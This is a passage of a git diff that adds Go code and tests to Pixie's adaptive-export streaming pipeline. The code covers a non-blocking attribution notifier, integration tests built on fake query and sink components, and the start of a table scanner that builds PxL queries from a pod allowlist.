+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package streaming
+
+import (
+ "context"
+ "strings"
+ "sync"
+ "sync/atomic"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+)
+
+// recordingQuerier is a fake querier: it records every PxL string it
+// is asked to run and answers with whatever rowsFunc returns for that
+// script (no rows when rowsFunc is nil).
+type recordingQuerier struct {
+	mu       sync.Mutex
+	queries  []string
+	rowsFunc func(pxl string) []map[string]any
+}
+
+// Query records pxl, then returns rowsFunc(pxl); it never returns an error.
+func (r *recordingQuerier) Query(_ context.Context, pxl string) ([]map[string]any, error) {
+	r.mu.Lock()
+	r.queries = append(r.queries, pxl)
+	r.mu.Unlock()
+	if fn := r.rowsFunc; fn != nil {
+		return fn(pxl), nil
+	}
+	return nil, nil
+}
+
+// all returns a copy of the recorded scripts in call order.
+func (r *recordingQuerier) all() []string {
+	r.mu.Lock()
+	defer r.mu.Unlock()
+	return append(make([]string, 0, len(r.queries)), r.queries...)
+}
+
+// countingWriter is a fake sink: it tallies, per table, how many rows
+// reached WritePixieRows, standing in for a real ClickHouse.
+type countingWriter struct {
+	mu       sync.Mutex
+	perTable map[string]int64
+	calls    atomic.Int64
+}
+
+func newCountingWriter() *countingWriter {
+	return &countingWriter{perTable: make(map[string]int64)}
+}
+
+func (w *countingWriter) WritePixieRows(_ context.Context, table string, rows []map[string]any) error {
+	w.calls.Add(1)
+	w.mu.Lock()
+	w.perTable[table] += int64(len(rows))
+	w.mu.Unlock()
+	return nil
+}
+
+func (w *countingWriter) count(table string) int64 {
+	w.mu.Lock()
+	n := w.perTable[table]
+	w.mu.Unlock()
+	return n
+}
+
+// TestIntegration_NotifierToScannerAllowlistFlow drives the rev-3
+// pipeline end to end, with only pixie and the sink replaced by fakes:
+//
+//	AttributionNotifier.Submit
+//	  → ActiveSet.Upsert
+//	  → FilterUpdater (debounce)
+//	  → TableScanner.buildPxL (allowlist embedded)
+//	  → recordingQuerier (verify PxL contains pod names)
+//	  → BatchWriter (verify rows reach sink)
+//
+// Assertions are made on the captured PxL strings and on the number
+// of rows that reached the fake sink.
+func TestIntegration_NotifierToScannerAllowlistFlow(t *testing.T) {
+	ctx, cancel := context.WithTimeout(context.Background(), 3*time.Second)
+	defer cancel()
+
+	// Fakes: the querier yields 3 rows iff the script mentions "wantpod".
+	q := &recordingQuerier{rowsFunc: func(pxl string) []map[string]any {
+		if !strings.Contains(pxl, "wantpod") {
+			return nil
+		}
+		return []map[string]any{{"a": 1}, {"a": 2}, {"a": 3}}
+	}}
+	sink := newCountingWriter()
+
+	// Real components, wired in pipeline order.
+	set := activeset.New()
+	notif := NewAttributionNotifier(set, NotifierConfig{BufferSize: 128})
+	updater := NewUpdater(set, UpdaterConfig{Debounce: 20 * time.Millisecond})
+	writer := NewBatchWriter("pgsql_events", sink, WriterConfig{
+		BatchEvery: 50 * time.Millisecond,
+		BatchRows:  1000,
+	})
+	scanCfg := ScannerConfig{
+		Table:           "pgsql_events",
+		RefreshInterval: 30 * time.Millisecond,
+		QueryTimeout:    500 * time.Millisecond,
+	}
+	scanner := NewScanner(scanCfg, q, writer, updater.Subscribe())
+
+	// One goroutine per component; each is handed the test context.
+	var wg sync.WaitGroup
+	wg.Add(4)
+	go func() { defer wg.Done(); notif.Run(ctx) }()
+	go func() { defer wg.Done(); updater.Run(ctx) }()
+	go func() { defer wg.Done(); writer.Run(ctx) }()
+	go func() { defer wg.Done(); scanner.Run(ctx) }()
+
+	// Activate two pods through the controller-facing API.
+	notif.Submit(activeset.Key{Namespace: "n", Pod: "wantpod"}, time.Now().Add(time.Minute))
+	notif.Submit(activeset.Key{Namespace: "n", Pod: "other"}, time.Now().Add(time.Minute))
+
+	// Poll (up to 2s) until the sink has received rows.
+	for stop := time.Now().Add(2 * time.Second); sink.count("pgsql_events") == 0 && time.Now().Before(stop); {
+		time.Sleep(20 * time.Millisecond)
+	}
+	if got := sink.count("pgsql_events"); got < 3 {
+		t.Fatalf("expected ≥3 rows written for pgsql_events, got %d", got)
+	}
+
+	// The most recent PxL script must name BOTH pods.
+	scripts := q.all()
+	if len(scripts) == 0 {
+		t.Fatalf("no PxL queries captured")
+	}
+	last := scripts[len(scripts)-1]
+	for _, pod := range []string{"wantpod", "other"} {
+		if !strings.Contains(last, pod) {
+			t.Fatalf("last PxL missing one of the pods:\n%s", last)
+		}
+	}
+
+	cancel()
+	wg.Wait()
+}
+
+// TestIntegration_EmptyActiveSetSkipsAllQueries runs the scanner for
+// 500ms with nothing active and requires that it issues no query at all.
+func TestIntegration_EmptyActiveSetSkipsAllQueries(t *testing.T) {
+	ctx, cancel := context.WithTimeout(context.Background(), 500*time.Millisecond)
+	defer cancel()
+
+	q := &recordingQuerier{rowsFunc: func(string) []map[string]any { return nil }}
+	updater := NewUpdater(activeset.New(), UpdaterConfig{Debounce: 10 * time.Millisecond})
+	writer := NewBatchWriter("redis_events", newCountingWriter(), WriterConfig{BatchEvery: 50 * time.Millisecond})
+	scanCfg := ScannerConfig{Table: "redis_events", RefreshInterval: 30 * time.Millisecond}
+	scanner := NewScanner(scanCfg, q, writer, updater.Subscribe())
+
+	var wg sync.WaitGroup
+	wg.Add(3)
+	go func() { defer wg.Done(); updater.Run(ctx) }()
+	go func() { defer wg.Done(); writer.Run(ctx) }()
+	go func() { defer wg.Done(); scanner.Run(ctx) }()
+
+	// Let the pipeline idle until the context times out, then join.
+	<-ctx.Done()
+	wg.Wait()
+
+	if n := len(q.all()); n != 0 {
+		t.Fatalf("scanner issued %d queries against empty active set; expected 0", n)
+	}
+}
+
+// TestIntegration_PrunePropagatesToScannerAllowlist — after the
+// controller prunes a pod, the scanner's subsequent PxL must stop
+// naming it.
+func TestIntegration_PrunePropagatesToScannerAllowlist(t *testing.T) {
+	ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
+	defer cancel()
+
+	set := activeset.New()
+	notif := NewAttributionNotifier(set, NotifierConfig{BufferSize: 64})
+	updater := NewUpdater(set, UpdaterConfig{Debounce: 20 * time.Millisecond})
+	q := new(recordingQuerier)
+	writer := NewBatchWriter("http_events", newCountingWriter(), WriterConfig{BatchEvery: 50 * time.Millisecond})
+	scanCfg := ScannerConfig{Table: "http_events", RefreshInterval: 30 * time.Millisecond}
+	scanner := NewScanner(scanCfg, q, writer, updater.Subscribe())
+
+	var wg sync.WaitGroup
+	wg.Add(4)
+	go func() { defer wg.Done(); notif.Run(ctx) }()
+	go func() { defer wg.Done(); updater.Run(ctx) }()
+	go func() { defer wg.Done(); writer.Run(ctx) }()
+	go func() { defer wg.Done(); scanner.Run(ctx) }()
+
+	// shutdown cancels the context and waits for all four goroutines.
+	shutdown := func() {
+		cancel()
+		wg.Wait()
+	}
+
+	// Two pods are activated so that the scanner keeps querying after
+	// "soon-pruned" is removed; with an empty allowlist it would go
+	// quiet and the filter change could not be witnessed.
+	notif.Submit(activeset.Key{Pod: "soon-pruned"}, time.Now().Add(time.Minute))
+	notif.Submit(activeset.Key{Pod: "stays"}, time.Now().Add(time.Minute))
+	waitForQueryContaining(t, q, "soon-pruned", time.Second)
+
+	preCount := len(q.all())
+	notif.SubmitRemove(activeset.Key{Pod: "soon-pruned"})
+
+	// Poll for up to 2s for a query issued after preCount that omits
+	// the pruned pod — proof that the removal travelled notifier →
+	// activeset → updater (debounce) → scanner.
+	for stop := time.Now().Add(2 * time.Second); time.Now().Before(stop); {
+		all := q.all()
+		for i := preCount; i < len(all); i++ {
+			if strings.Contains(all[i], "soon-pruned") {
+				continue
+			}
+			// all[i] is the first clean query. Any LATER query that
+			// names the pod again means a stale submission landed
+			// after the new one.
+			for j := i + 1; j < len(all); j++ {
+				if strings.Contains(all[j], "soon-pruned") {
+					shutdown()
+					t.Fatalf("post-prune query at idx %d contains pruned pod after a clean query at idx %d:\n%s",
+						j, i, all[j])
+				}
+			}
+			shutdown()
+			return
+		}
+		time.Sleep(20 * time.Millisecond)
+	}
+	shutdown()
+	t.Fatalf("scanner kept issuing queries containing 'soon-pruned' for 2s after Remove; captured %d queries",
+		len(q.all())-preCount)
+}
+
+// waitForQueryContaining polls the recorder every 10ms and returns as
+// soon as some captured query contains needle; if none does before
+// timeout elapses, the test fails with the captured queries listed.
+func waitForQueryContaining(t *testing.T, q *recordingQuerier, needle string, timeout time.Duration) {
+	t.Helper()
+	for stop := time.Now().Add(timeout); time.Now().Before(stop); {
+		for _, script := range q.all() {
+			if strings.Contains(script, needle) {
+				return
+			}
+		}
+		time.Sleep(10 * time.Millisecond)
+	}
+	t.Fatalf("no query containing %q within %v; captured: %v", needle, timeout, q.all())
+}
diff --git a/src/vizier/services/adaptive_export/internal/streaming/notifier.go b/src/vizier/services/adaptive_export/internal/streaming/notifier.go
new file mode 100644
index 00000000000..2921630a2ab
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/notifier.go
@@ -0,0 +1,166 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package streaming
+
+import (
+ "context"
+ "sync/atomic"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+)
+
+// AttributionNotifier decouples the controller's per-event callback
+// (controller.handle) from ActiveSet writes. Without this shim, a
+// stalled ActiveSet subscriber (e.g. a slow Supervisor under load)
+// could back-pressure controller.handle and stall trigger consumption
+// — i.e. break the operator's main invariant: kubescape events are
+// processed in time.
+//
+// Contract:
+//   - Submit / SubmitRemove NEVER block. On a full buffer the oldest
+//     queued event is discarded and DroppedCount is bumped.
+//   - One Run goroutine consumes the buffer and applies to ActiveSet.
+//   - Events with an empty Pod (host-pid) are filtered, not dropped,
+//     and are counted separately via FilteredCount.
+type AttributionNotifier struct {
+ set *activeset.ActiveSet
+ cfg NotifierConfig
+ in chan notifyEvent // buffered queue between Submit/SubmitRemove and Run
+
+ dropped atomic.Int64 // events lost to buffer overflow
+ filtered atomic.Int64 // submissions rejected for an empty Pod
+}
+
+// NotifierConfig tunes the notifier. The zero value is usable.
+type NotifierConfig struct {
+	// BufferSize is the input channel capacity; values <= 0 select
+	// 1024. Larger rides out longer consumer stalls. On overflow the
+	// OLDEST queued event is discarded (stale loses to fresh).
+	BufferSize int
+}
+
+func (c NotifierConfig) defaulted() NotifierConfig {
+	if c.BufferSize > 0 {
+		return c
+	}
+	c.BufferSize = 1024
+	return c
+}
+
+// notifyEvent is one queued ActiveSet mutation: an upsert, or a removal.
+type notifyEvent struct {
+ key activeset.Key // pod the event applies to
+ tEnd time.Time // passed to ActiveSet.Upsert; left zero for removals
+ remove bool // true → Remove(key); false → Upsert(key, tEnd)
+}
+
+// NewAttributionNotifier builds a notifier that writes into set, with an
+// input buffer sized from cfg (defaults applied). Call Run(ctx) to consume.
+func NewAttributionNotifier(set *activeset.ActiveSet, cfg NotifierConfig) *AttributionNotifier {
+	cfg = cfg.defaulted()
+	return &AttributionNotifier{
+		in:  make(chan notifyEvent, cfg.BufferSize),
+		cfg: cfg,
+		set: set,
+	}
+}
+
+// Submit queues an upsert of key with tEnd and never blocks; on
+// overflow the oldest queued event is dropped and counted. Keys with
+// an empty Pod (host-pid) are counted as filtered and go no further.
+func (n *AttributionNotifier) Submit(key activeset.Key, tEnd time.Time) {
+	if key.Pod != "" {
+		n.send(notifyEvent{key: key, tEnd: tEnd})
+		return
+	}
+	n.filtered.Add(1)
+}
+
+// SubmitRemove queues a removal of key; same non-blocking contract as Submit.
+func (n *AttributionNotifier) SubmitRemove(key activeset.Key) {
+	if key.Pod != "" {
+		n.send(notifyEvent{key: key, remove: true})
+		return
+	}
+	n.filtered.Add(1)
+}
+
+// send enqueues e without blocking, evicting the oldest event when full.
+func (n *AttributionNotifier) send(e notifyEvent) {
+	select {
+	case n.in <- e:
+		return
+	default:
+	}
+	// Buffer full: evict the oldest queued event and count it as dropped.
+	select {
+	case <-n.in:
+		n.dropped.Add(1)
+	default:
+	}
+	// Retry once; if another producer took the slot, e is dropped too.
+	select {
+	case n.in <- e:
+	default:
+		n.dropped.Add(1)
+	}
+}
+
+// Run applies queued events to the ActiveSet until ctx is cancelled.
+// It does not drain on shutdown: events still buffered once Run has
+// observed the cancellation are abandoned.
+func (n *AttributionNotifier) Run(ctx context.Context) {
+	for {
+		select {
+		case ev := <-n.in:
+			if ev.remove {
+				n.set.Remove(ev.key)
+				continue
+			}
+			n.set.Upsert(ev.key, ev.tEnd)
+		case <-ctx.Done():
+			return
+		}
+	}
+}
+
+// DroppedCount returns how many events were lost to buffer overflow
+// (evicted oldest entries plus submits whose retry failed). Non-zero
+// is a backpressure signal: the consumer can't keep up.
+func (n *AttributionNotifier) DroppedCount() int64 { return n.dropped.Load() }
+
+// FilteredCount returns the number of submissions rejected for an empty Pod.
+func (n *AttributionNotifier) FilteredCount() int64 { return n.filtered.Load() }
+
+// SubmitFromController adapts Submit to the callback shape intended for
+// controller.Config.OnAttribution, so main.go can wire it directly:
+//
+//	ctlCfg.OnAttribution = notifier.SubmitFromController
+func (n *AttributionNotifier) SubmitFromController(namespace, pod string, tEnd time.Time) {
+	key := activeset.Key{Namespace: namespace, Pod: pod}
+	n.Submit(key, tEnd)
+}
+
+// RemoveFromController adapts SubmitRemove to controller.Config.OnPrune.
+func (n *AttributionNotifier) RemoveFromController(namespace, pod string) {
+	n.SubmitRemove(activeset.Key{Pod: pod, Namespace: namespace})
+}
+
+// (Backpressure logging was deliberately not wired internally to
+// avoid coupling the notifier to a particular log cadence. Callers
+// observe via DroppedCount() and log on their own schedule.)
diff --git a/src/vizier/services/adaptive_export/internal/streaming/notifier_test.go b/src/vizier/services/adaptive_export/internal/streaming/notifier_test.go
new file mode 100644
index 00000000000..7ae020bab8d
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/notifier_test.go
@@ -0,0 +1,220 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package streaming
+
+import (
+ "context"
+ "sync"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+)
+
+// TestNotifier_CallerReturnsImmediatelyEvenIfConsumerStalls — the
+// synchronous callback path (controller.handle → cfg.OnAttribution)
+// must not block the caller even when the consuming end is stalled.
+//
+// With a Notifier wired between controller and ActiveSet, Submit
+// MUST give bounded latency on the producer side: 1000 calls against
+// a never-drained buffer have to finish within the 100ms budget.
+func TestNotifier_CallerReturnsImmediatelyEvenIfConsumerStalls(t *testing.T) {
+ set := activeset.New()
+ // Deliberately no ctx / Run here — a consumer that never runs
+ // stands in for a stalled one.
+
+ n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 32})
+ // No consumer goroutine is started, so nothing ever drains the
+ // buffer. The producer-side call MUST still return.
+ // (We never start n.Run here on purpose.)
+
+ start := time.Now()
+ for i := 0; i < 1000; i++ {
+ // Submit MORE events than the buffer can hold.
+ n.Submit(activeset.Key{Pod: "p"}, time.Now().Add(time.Minute))
+ }
+ elapsed := time.Since(start)
+ if elapsed > 100*time.Millisecond {
+ t.Fatalf("1000 Submit() calls took %v — producer is blocking on a stalled consumer", elapsed)
+ }
+ // Sanity: at least some events were dropped (since we never started Run).
+ if n.DroppedCount() == 0 {
+ t.Fatalf("expected DroppedCount > 0 with no consumer, got 0")
+ }
+}
+
+// TestNotifier_DeliversEventsWhenConsumerKeepsUp — happy path.
+// We submit slowly enough vs a generously-sized buffer that the
+// consumer trivially keeps up. Tests the basic delivery contract
+// without measuring the buffer's drop semantics (that's covered by
+// TestNotifier_DroppedCountAccurate).
+func TestNotifier_DeliversEventsWhenConsumerKeepsUp(t *testing.T) {
+ set := activeset.New()
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+
+ // Buffer >> burst so no drops are forced; throttle the submit
+ // loop so the consumer gets scheduled between sends.
+ n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 1024})
+ go n.Run(ctx)
+
+ tEnd := time.Now().Add(5 * time.Minute)
+ for i := 0; i < 50; i++ {
+ n.Submit(activeset.Key{Pod: "p" + string(rune('a'+(i%26)))}, tEnd)
+ if i%5 == 0 {
+ // Yield so the consumer can drain — production callers
+ // (controller.handle) naturally have inter-event gaps.
+ time.Sleep(time.Microsecond)
+ }
+ }
+ // Wait until consumer drains.
+ deadline := time.Now().Add(500 * time.Millisecond)
+ for set.Size() < 26 && time.Now().Before(deadline) {
+ time.Sleep(5 * time.Millisecond)
+ }
+ if set.Size() != 26 {
+ t.Fatalf("expected 26 distinct pods, got %d", set.Size())
+ }
+ if n.DroppedCount() != 0 {
+ t.Fatalf("expected 0 drops with buffer>>burst, got %d", n.DroppedCount())
+ }
+}
+
+// TestNotifier_SubmitConcurrentlySafe — the producer path must be
+// safe under concurrent callers (controller has only one goroutine
+// in handle, but the contract should be conservative).
+func TestNotifier_SubmitConcurrentlySafe(t *testing.T) {
+ set := activeset.New()
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 256})
+ go n.Run(ctx)
+
+ var wg sync.WaitGroup
+ for i := 0; i < 50; i++ {
+ i := i
+ wg.Add(1)
+ go func() {
+ defer wg.Done()
+ for j := 0; j < 20; j++ {
+ n.Submit(activeset.Key{Pod: string(rune('a' + (i % 26)))}, time.Now().Add(time.Minute))
+ }
+ }()
+ }
+ wg.Wait()
+ // Allow drain.
+ deadline := time.Now().Add(500 * time.Millisecond)
+ for set.Size() < 26 && time.Now().Before(deadline) {
+ time.Sleep(5 * time.Millisecond)
+ }
+ if set.Size() == 0 {
+ t.Fatalf("no pods landed in ActiveSet under concurrent Submit")
+ }
+}
+
+// TestNotifier_RunStopsOnCtxCancel — Run must return promptly (within
+// 500ms here) once its ctx is cancelled.
+func TestNotifier_RunStopsOnCtxCancel(t *testing.T) {
+ set := activeset.New()
+ ctx, cancel := context.WithCancel(context.Background())
+ n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 16})
+ done := make(chan struct{})
+ go func() { n.Run(ctx); close(done) }()
+
+ cancel()
+ select {
+ case <-done:
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("Run did not return within 500ms of ctx cancel")
+ }
+}
+
+// TestNotifier_RemoveDeliveredAsRemoval — the Notifier must
+// distinguish Upsert vs Remove events.
+func TestNotifier_RemoveDeliveredAsRemoval(t *testing.T) {
+ set := activeset.New()
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 4})
+ go n.Run(ctx)
+
+ k := activeset.Key{Pod: "p1"}
+ n.Submit(k, time.Now().Add(time.Minute))
+ // drain
+ deadline := time.Now().Add(300 * time.Millisecond)
+ for set.Size() == 0 && time.Now().Before(deadline) {
+ time.Sleep(5 * time.Millisecond)
+ }
+ if set.Size() != 1 {
+ t.Fatalf("upsert didn't land")
+ }
+ n.SubmitRemove(k)
+ deadline = time.Now().Add(300 * time.Millisecond)
+ for set.Size() == 1 && time.Now().Before(deadline) {
+ time.Sleep(5 * time.Millisecond)
+ }
+ if set.Size() != 0 {
+ t.Fatalf("remove didn't land")
+ }
+}
+
+// TestNotifier_DroppedCountAccurate — overflow accounting. With no consumer,
+// drops must equal submits-bufSize within ±1 — neither under- nor over-counted.
+func TestNotifier_DroppedCountAccurate(t *testing.T) {
+	const submits, bufSize = 100, 4
+	set := activeset.New()
+	n := NewAttributionNotifier(set, NotifierConfig{BufferSize: bufSize})
+	for i := 0; i < submits; i++ {
+		n.Submit(activeset.Key{Pod: "p"}, time.Now())
+	}
+	if got := n.DroppedCount(); got < submits-bufSize-1 || got > submits-bufSize+1 {
+		t.Fatalf("expected ~%d drops, got %d", submits-bufSize, got)
+	}
+}
+
+// TestNotifier_HostPidEntriesAreFiltered — host-pid events (empty
+// Pod) cannot be streamed and must be dropped at the Notifier so the
+// ActiveSet never accumulates pod-less rows.
+func TestNotifier_HostPidEntriesAreFiltered(t *testing.T) {
+ set := activeset.New()
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 8})
+ go n.Run(ctx)
+ n.Submit(activeset.Key{Pod: ""}, time.Now().Add(time.Minute))
+ n.Submit(activeset.Key{Pod: "real"}, time.Now().Add(time.Minute))
+ deadline := time.Now().Add(300 * time.Millisecond)
+ for set.Size() < 1 && time.Now().Before(deadline) {
+ time.Sleep(5 * time.Millisecond)
+ }
+ if set.Size() != 1 {
+ t.Fatalf("expected 1 entry (only real), got %d", set.Size())
+ }
+ if n.FilteredCount() < 1 {
+ t.Fatalf("expected at least 1 filtered, got %d", n.FilteredCount())
+ }
+}
+
+// TestNotifier_StatsOnFreshInstance — the counter accessors must not
+// panic, and must read zero, on a freshly-constructed notifier (no Run yet).
+func TestNotifier_StatsOnFreshInstance(t *testing.T) {
+ set := activeset.New()
+ n := NewAttributionNotifier(set, NotifierConfig{})
+ if n.DroppedCount() != 0 || n.FilteredCount() != 0 {
+ t.Fatalf("fresh notifier should report zero counters")
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/streaming/scanner.go b/src/vizier/services/adaptive_export/internal/streaming/scanner.go
new file mode 100644
index 00000000000..d77941e886e
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/scanner.go
@@ -0,0 +1,357 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package streaming
+
+import (
+ "context"
+ "fmt"
+ "strconv"
+ "strings"
+ "sync/atomic"
+ "time"
+
+ log "github.com/sirupsen/logrus"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile"
+)
+
+// Querier executes a PxL string against a vizier and returns the
+// resulting flat rows. Same shape as controller.PixieQuerier; kept
+// independently here to avoid an import cycle.
+type Querier interface {
+ Query(ctx context.Context, pxl string) ([]map[string]any, error)
+}
+
+// ScannerConfig tunes one TableScanner; unset durations are defaulted.
+type ScannerConfig struct {
+ // Table is the pixie observation table this scanner targets
+ // (e.g. "pgsql_events"). REQUIRED.
+ Table string
+
+ // QueryWindow is how far back each query looks; it is rendered as
+ // the relative PxL `start_time` (60s → "-60s"). Must be longer than
+ // RefreshInterval + maximum expected query latency, otherwise rows
+ // in the gap between consecutive runs would be missed. 0 → 60s.
+ QueryWindow time.Duration
+
+ // RefreshInterval is the wait between successful PxL submissions
+ // while the filter is stable; a filter change arriving during the
+ // wait triggers the next submission sooner. 0 → 30s.
+ RefreshInterval time.Duration
+
+ // QueryTimeout bounds one PxL call. 0 → 180s.
+ QueryTimeout time.Duration
+
+ // BackoffInitial / BackoffMax — exponential backoff on Querier
+ // errors. 0 → 1s / 30s.
+ BackoffInitial time.Duration
+ BackoffMax time.Duration
+
+ // Rec records per-pull read/submitted counts (ADAPTIVE_RECONCILE).
+ // nil → reconcile.Nop{} in defaulted() (instrument off).
+ Rec reconcile.Recorder
+
+ // Hostname is stamped on reconcile rows.
+ Hostname string
+}
+
+// defaulted returns a copy of c in which every non-positive duration
+// has been replaced by its default (window 60s, refresh 30s, timeout
+// 180s, backoff 1s..30s) and a nil Rec by reconcile.Nop{}.
+func (c ScannerConfig) defaulted() ScannerConfig {
+	// fill overwrites *d with def when *d is zero or negative.
+	fill := func(d *time.Duration, def time.Duration) {
+		if *d <= 0 {
+			*d = def
+		}
+	}
+	fill(&c.QueryWindow, 60*time.Second)
+	fill(&c.RefreshInterval, 30*time.Second)
+	fill(&c.QueryTimeout, 180*time.Second)
+	fill(&c.BackoffInitial, 1*time.Second)
+	fill(&c.BackoffMax, 30*time.Second)
+	// Run calls Rec.Record unconditionally, so nil must become a no-op.
+	if c.Rec == nil {
+		c.Rec = reconcile.Nop{}
+	}
+	return c
+}
+
+// TableScanner runs ONE PxL submission per refresh cycle for ONE
+// pixie table, with a pod allowlist drawn from an upstream Filter
+// channel. Output goes to a per-table BatchWriter.
+//
+// This is the rev-3 replacement for pushPixieRows' per-hash×per-table
+// fan-out. Goroutines created: 1 per TableScanner. Concurrency
+// against vizier-query-broker: 1 per scanner = N (number of tables).
+type TableScanner struct {
+ cfg ScannerConfig
+ querier Querier
+ writer *BatchWriter
+ filters <-chan Filter
+
+ currentFilter Filter
+
+ queries atomic.Int64
+ queryErr atomic.Int64
+ rowsIn atomic.Int64
+ skipped atomic.Int64
+}
+
+// NewScanner builds a TableScanner for one table. cfg is passed through
+// defaulted(), so unset tunables take their defaults. filters is the
+// channel returned by FilterUpdater.Subscribe; the scanner reads its
+// pod allowlist from it.
+func NewScanner(cfg ScannerConfig, querier Querier, writer *BatchWriter, filters <-chan Filter) *TableScanner {
+	sc := new(TableScanner)
+	sc.cfg = cfg.defaulted()
+	sc.querier, sc.writer, sc.filters = querier, writer, filters
+	return sc
+}
+
+// Run is the scanner's loop; it owns the calling goroutine and returns
+// when ctx is done or the filters channel is closed.
+//
+//  1. Block until the first filter arrives.
+//  2. Empty allowlist: skip the query and block until the next filter.
+//  3. Otherwise build the PxL, query, and hand the rows to the writer,
+//     then sleep RefreshInterval or until a new filter arrives.
+//  4. On a Querier error, wait the (doubling, capped) backoff or until a
+//     new filter arrives; a failure caused by ctx shutdown just returns.
+func (s *TableScanner) Run(ctx context.Context) {
+	// 1. Initial filter.
+	select {
+	case f, ok := <-s.filters:
+		if !ok {
+			return
+		}
+		s.currentFilter = f
+	case <-ctx.Done():
+		return
+	}
+
+	backoff := s.cfg.BackoffInitial
+	resetBackoff := func() { backoff = s.cfg.BackoffInitial }
+	bumpBackoff := func() {
+		backoff *= 2
+		if backoff > s.cfg.BackoffMax {
+			backoff = s.cfg.BackoffMax
+		}
+	}
+
+	for {
+		if ctx.Err() != nil {
+			return
+		}
+
+		// Empty allowlist short-circuit: nothing to query.
+		if s.currentFilter.Mode == FilterModeAllowlist && len(s.currentFilter.Pods) == 0 {
+			s.skipped.Add(1)
+			// Diagnostic: lets an operator tell "empty ActiveSet → skipping"
+			// apart from "queried but the broker returned 0 rows" (which
+			// logs "query completed rows=0"). Naturally rate-limited: we
+			// block on the next filter immediately after.
+			log.WithFields(log.Fields{
+				"table":   s.cfg.Table,
+				"version": s.currentFilter.Version,
+			}).Info("streaming.TableScanner: empty allowlist (ActiveSet has no steered pods) — skipping query until a filter with pods arrives")
+			// Wait for either: a new filter arrives, or ctx done.
+			select {
+			case <-ctx.Done():
+				return
+			case f, ok := <-s.filters:
+				if !ok {
+					return
+				}
+				s.currentFilter = f
+			}
+			continue
+		}
+
+		// 2. Build PxL + execute.
+		pxl := s.buildPxL(s.currentFilter)
+		winEnd := time.Now()
+		winStart := winEnd.Add(-s.cfg.QueryWindow)
+		qctx, cancel := context.WithTimeout(ctx, s.cfg.QueryTimeout)
+		rows, err := s.querier.Query(qctx, pxl)
+		cancel()
+		s.queries.Add(1)
+		if err != nil {
+			if ctx.Err() != nil {
+				// Shutdown aborted the query: not a broker failure, so don't count, record or log it.
+				return
+			}
+			s.queryErr.Add(1)
+			s.cfg.Rec.Record(ctx, reconcile.Row{
+				TS: winEnd, Mode: "streaming", Table: s.cfg.Table,
+				WinStart: winStart, WinEnd: winEnd,
+				ReadCount: 0, WroteCount: 0, WriteErr: err.Error(),
+				Hostname: s.cfg.Hostname,
+			})
+			log.WithError(err).WithFields(log.Fields{
+				"table":   s.cfg.Table,
+				"pods":    len(s.currentFilter.Pods),
+				"mode":    s.currentFilter.Mode,
+				"backoff": backoff,
+			}).Warn("streaming.TableScanner: query failed; backing off")
+			// Wait out the backoff, unless a new filter arrives first (which also resets the backoff).
+			select {
+			case <-ctx.Done():
+				return
+			case f, ok := <-s.filters:
+				if !ok {
+					return
+				}
+				s.currentFilter = f
+				resetBackoff()
+			case <-time.After(backoff):
+				bumpBackoff()
+			}
+			continue
+		}
+		resetBackoff()
+		s.rowsIn.Add(int64(len(rows)))
+
+		// 3. Hand off to writer; submitted stays 0 if the writer refuses the batch.
+		submitted := 0
+		if len(rows) > 0 && s.writer.Submit(rows) {
+			submitted = len(rows)
+		}
+		s.cfg.Rec.Record(ctx, reconcile.Row{
+			TS: winEnd, Mode: "streaming", Table: s.cfg.Table,
